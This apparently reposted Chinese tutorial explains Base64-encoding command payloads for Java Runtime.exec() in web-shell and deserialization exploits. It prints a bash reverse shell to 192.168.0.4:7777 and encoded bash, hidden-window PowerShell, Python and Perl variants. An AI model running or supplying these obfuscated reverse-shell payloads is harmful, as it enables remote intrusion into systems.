java.lang.Runtime.exec() Payload知識(shí)點(diǎn)詳解
有時(shí),通過(guò)Runtime.getRuntime().exec()執(zhí)行命令的有效負(fù)載有時(shí)會(huì)失敗。使用Web Shell,反序列化利用或通過(guò)其他媒介時(shí),可能會(huì)發(fā)生這種情況。
有時(shí)這是因?yàn)橹囟ㄏ蚝凸艿雷址氖褂迷趩?dòng)過(guò)程的上下文中沒(méi)有意義。例如,在shell中執(zhí)行l(wèi)s> dir_listing會(huì)將當(dāng)前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中,該命令將被解釋為獲取>和dir_listing目錄的列表。
有時(shí),StringTokenizer類會(huì)破壞其中包含空格的參數(shù),該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。
借助Base64編碼,下面的轉(zhuǎn)換器可以幫助減少這些問(wèn)題。它可以通過(guò)調(diào)用Bash或PowerShell來(lái)制作管道并重新定向,還可以確保參數(shù)內(nèi)沒(méi)有空格。
樣例:
原文
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}#bashpowershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==#powershellpython -c exec(’YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=’.decode(’base64’))#pythonperl -MMIME::Base64 -e eval(decode_base64(’YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=’))#perl
中間的字符均為“base64”編碼。
知識(shí)點(diǎn)擴(kuò)展:
java.lang.Runtime.getRuntime().exec(cmd)命令中參數(shù)不能用空格怎么辦?
項(xiàng)目中無(wú)法執(zhí)行c程序,猜測(cè)是exec()函數(shù)的問(wèn)題
String cmd= exe_path + ' ' +video + ' ' +host + ':' + port;Process process = runtime.exec(cmd);
到此這篇關(guān)于java.lang.Runtime.exec() Payload知識(shí)點(diǎn)詳解的文章就介紹到這了,更多相關(guān)java.lang.Runtime.exec() Payload內(nèi)容請(qǐng)搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)!
相關(guān)文章:
1. jsp實(shí)現(xiàn)登錄驗(yàn)證的過(guò)濾器2. ASP基礎(chǔ)入門(mén)第八篇(ASP內(nèi)建對(duì)象Application和Session)3. 概述IE和SQL2k開(kāi)發(fā)一個(gè)XML聊天程序4. 解析原生JS getComputedStyle5. ASP刪除img標(biāo)簽的style屬性只保留src的正則函數(shù)6. jsp實(shí)現(xiàn)登錄界面7. jsp EL表達(dá)式詳解8. Jsp中request的3個(gè)基礎(chǔ)實(shí)踐9. jsp cookie+session實(shí)現(xiàn)簡(jiǎn)易自動(dòng)登錄10. msxml3.dll 錯(cuò)誤 800c0019 系統(tǒng)錯(cuò)誤:-2146697191解決方法
